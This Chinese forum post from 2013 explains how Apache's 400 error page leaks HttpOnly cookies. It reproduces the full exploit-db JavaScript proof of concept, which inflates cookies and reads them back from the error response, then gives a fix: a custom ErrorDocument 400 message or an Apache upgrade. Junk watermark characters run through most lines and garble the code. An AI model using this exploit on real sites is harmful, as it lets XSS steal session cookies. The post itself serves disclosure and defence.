很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。- q& s, O5 W8 w! L: C1 v! h
8 F6 c4 S: ]+ N用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:" `" G* I: f/ U
5 F( D* P' r6 j \0 C, S' t/ b
- a. l+ q" e9 J
// http://www.exploit-db.com/exploits/18442/
4 F' A. }4 j1 l# B# {0 Mfunction setCookies (good) {
$ y) R& I8 ?4 ~8 t5 n, Y* r6 v// Construct string for cookie value* R- o X$ P4 `% L
var str = "";- | B, M( M; |6 G) W2 }
for (var i=0; i< 819; i++) {
) m& l! a8 M; a% v8 D# h7 P0 ^# g2 Mstr += "x";! n! W' B* Q t" _
}
/ E+ E' ~$ z2 h/ m// Set cookies
( |7 d1 x0 C# S9 ?" g# u% {$ Qfor (i = 0; i < 10; i++) {
$ ]) A+ d" w* G// Expire evil cookie' G# l: D7 [6 x
if (good) {" f- n( R& q) F. A8 _
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";, b& c% N" q* b2 v3 k4 ^2 V7 U5 S8 A
}1 X& u# q/ ^$ S8 {2 q; k
// Set evil cookie
1 b( X% r, p* m! F( f8 belse {
: E+ R" M6 t, uvar cookie = "xss"+i+"="+str+";path=/";
* h1 ~4 T e+ d5 Q3 A1 p}# S- A" p( i8 d8 o. B
document.cookie = cookie;" h- a* g z* z8 T
}* O8 V3 D) g$ ?& |/ u& V8 Y
}" G" k* x" ]6 h9 s5 [: F
function makeRequest() {
6 f9 V: B# `% k% usetCookies();5 ~7 ~$ A" V) L v6 a
function parseCookies () {
/ Q- M$ ^7 n: V# j6 ~/ K, t. Uvar cookie_dict = {};2 v/ [9 y. m7 b' r* [ Y
// Only react on 400 status
9 |$ G. I2 T7 g' J, W/ F+ M! ~- Qif (xhr.readyState === 4 && xhr.status === 400) {7 C9 k L/ `. T" `6 t& p$ |
// Replace newlines and match <pre> content
. R( N& T7 ]+ ]4 T7 m6 e& T3 k' gvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
" Z* e" A$ d8 y/ v) Gif (content.length) {
& X# ~: d# a1 e# t// Remove Cookie: prefix
7 [$ _. ]5 x2 U/ p* Z7 y5 hcontent = content[1].replace("Cookie: ", "");( ]8 c) o3 A8 S: c+ o9 E
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);2 o- J. w) L% s& z! L# N
// Add cookies to object
z% f% {$ U. C3 Kfor (var i=0; i<cookies.length; i++) {
: m+ z( @* X* U, {/ Cvar s_c = cookies.split('=',2);3 l) V7 F/ n/ L7 n
cookie_dict[s_c[0]] = s_c[1];* A+ r- d! }2 v2 a7 |- g4 X
}
1 u( |0 ^) s/ H3 H+ h& L4 z7 Z}
. m$ `3 G; |6 N; F" X// Unset malicious cookies
( C4 d8 ~. S" `6 L3 `$ esetCookies(true);/ j" c$ a3 p: ?; L( O
alert(JSON.stringify(cookie_dict));
e' w: a* D; Z}( G9 D6 Q. i# [+ y" r! |" [
}
" w: R. z" M$ b* [' I' V& v+ H// Make XHR request
) D# A, {; j5 z. l. g; dvar xhr = new XMLHttpRequest();
& I1 \7 J) U" y3 b: O. v, Pxhr.onreadystatechange = parseCookies;
2 K" i) ^. x; y9 g. Qxhr.open("GET", "/", true);1 t8 ?; M# H M6 _
xhr.send(null);" L1 B0 @0 [4 W3 x3 L- ?" n
}, ?) d9 U6 F" y) D
makeRequest();4 r2 k, O+ _6 {- [8 k7 v- e& I
* z3 P6 ]0 ^8 Z. F2 ?你就能看见华丽丽的400错误包含着cookie信息。
( c* g/ `6 B& ^1 z7 i* a
2 R: H( W, d+ d4 W下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
" u+ J- j' h$ ^
" s+ |& P7 s8 \ b. F. v- j: L修复方案:
\& ]2 [1 U: }& I- y) V
% E- a1 }6 S( q5 N5 |; `Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下
' o. a5 ?/ e# q, p- q( X3 |- ?5 g. Q& F5 Z+ G& h9 K6 E) k
In the event of a problem or error, Apachecan be configured to do one of four things, t1 ^. S4 Q7 q3 j0 Q3 M/ E5 U. C
5 k# I. g. m; r3 p. ?6 F# p
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息. r9 H9 r4 d6 ~
2. output acustomized message输出一段信息
/ S4 v' v, }1 A2 M( l; M3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面 + T! l1 a: t2 t% L
4. redirect to an external URL to handle theproblem/error转向一个外部URL
4 L$ e W) R& b; E& @5 V0 @2 @5 `( {- N& E, S* u: ]
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容
2 f1 [: q7 j: N# n
% B) N* R8 l- j. Y: tApache配置:
, N8 b M2 J0 f+ v' r
$ G$ d5 [) c2 b5 E4 aErrorDocument400 " security test"
. M1 @* L! P, ~% O4 i
" D! `2 Z: o2 v6 W8 a0 y当然,升级apache到最新也可:)。* [- G, `& ~1 J
0 w" ^) _+ k; d1 c- A& H
参考:http://httpd.apache.org/security/vulnerabilities_22.html
|1 b! H0 X n, e# W, Q$ r* [% o
|
发表于 2013-4-19 19:15:43
收藏
支持
反对